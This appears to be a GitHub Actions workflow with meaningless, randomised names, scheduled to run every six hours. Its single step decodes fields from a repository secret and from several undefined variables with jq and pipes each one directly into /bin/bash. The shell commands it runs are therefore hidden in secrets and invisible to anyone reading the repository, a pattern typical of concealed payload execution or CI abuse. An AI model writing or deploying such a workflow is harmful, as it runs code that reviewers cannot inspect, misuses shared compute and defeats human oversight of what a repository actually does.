name: fengyuanchai4545

on:
  workflow_dispatch:
  schedule:
    - cron: '15 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fengyuanchai4545
        env:
          lyo709: ${{ secrets.lyo709 }}
        run: |
          echo $lyo709 | jq -r .w40593 | /bin/bash
          echo $pff5493 | jq -r .lhgxj5049 | /bin/bash
          echo $up6 | jq -r .tc4141 | /bin/bash
          echo $p1185 | jq -r .lcxj5 | /bin/bash
          echo $tqcxb686 | jq -r .cyrzd1750 | /bin/bash

